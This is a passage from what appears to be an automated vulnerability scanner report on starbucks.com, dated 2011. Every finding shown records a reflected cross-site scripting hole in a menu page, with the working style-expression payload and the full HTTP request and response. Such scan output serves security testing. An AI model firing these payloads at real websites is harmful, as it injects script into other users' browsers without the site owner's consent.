...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha?64dcf"style="x:expression(alert(1))"6458be98685=1"/>
...[SNIP]...

2.135. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7efd8"style="x:expression(alert(1))"53305b3ac5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:26 GMT
Connection: close
Content-Length: 43432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style="x:expression(alert(1))"53305b3ac5e=1"/>
...[SNIP]...

2.136. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/pumpkin-spice-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4f2e"style="x:expression(alert(1))"93a50fd3873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:49 GMT
Connection: close
Content-Length: 43720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style="x:expression(alert(1))"93a50fd3873=1"/>
...[SNIP]...

2.137. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5878"style="x:expression(alert(1))"e44d0e07167 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-caramel-macchiato?d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:05 GMT
Connection: close
Content-Length: 43234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato?d5878"style="x:expression(alert(1))"e44d0e07167=1"/>
...[SNIP]...

2.138. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c121"style="x:expression(alert(1))"3bc6692e203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:18 GMT
Connection: close
Content-Length: 43735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style="x:expression(alert(1))"3bc6692e203=1"/>
...[SNIP]...

2.139. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1f1f"style="x:expression(alert(1))"645f16f209c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-flavored-latte?c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:04 GMT
Connection: close
Content-Length: 43440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte?c1f1f"style="x:expression(alert(1))"645f16f209c=1"/>
...[SNIP]...

2.140. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/toffee-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec4e2"style="x:expression(alert(1))"d6a9d7dfee8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/toffee-mocha?ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:13 GMT
Connection: close
Content-Length: 42936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/toffee-mocha?ec4e2"style="x:expression(alert(1))"d6a9d7dfee8=1"/>
...[SNIP]...

2.141. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91b4a"style="x:expression(alert(1))"ce231ac2d92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/white-chocolate-mocha?91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:03 GMT
Connection: close
Content-Length: 43180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha?91b4a"style="x:expression(alert(1))"ce231ac2d92=1"/>
...[SNIP]...

2.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccae7"style%3d"x%3aexpression(alert(1))"533387bf426 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccae7"style="x:expression(alert(1))"533387bf426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages?ccae7"style%3d"x%3aexpression(alert(1))"533387bf426=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:00 GMT
Connection: close
Content-Length: 52502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?ccae7"style="x:expression(alert(1))"533387bf426=1"/>
...[SNIP]...

2.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3eff8"style="x:expression(alert(1))"8e1c5ef3e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:00 GMT
Connection: close
Content-Length: 45428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style="x:expression(alert(1))"8e1c5ef3e74=1"/>
...[SNIP]...

2.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfdb4"style="x:expression(alert(1))"f631b1836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:06 GMT
Connection: close
Content-Length: 44981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style="x:expression(alert(1))"f631b1836=1"/>
...[SNIP]...

2.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3dba1"style="x:expression(alert(1))"e2d7ccafcf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:12 GMT
Connection: close
Content-Length: 43470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style="x:expression(alert(1))"e2d7ccafcf6=1"/>
...[SNIP]...

2.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86623"style%3d"x%3aexpression(alert(1))"10adab1fa11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86623"style="x:expression(alert(1))"10adab1fa11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style%3d"x%3aexpression(alert(1))"10adab1fa11=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:15 GMT
Connection: close
Content-Length: 45260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style="x:expression(alert(1))"10adab1fa11=1"/>
...[SNIP]...

2.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce1b8"style="x:expression(alert(1))"2d1316ff148 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:05 GMT
Connection: close
Content-Length: 43245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style="x:expression(alert(1))"2d1316ff148=1"/>
...[SNIP]...

2.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dfa"style="x:expression(alert(1))"3f1516979fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
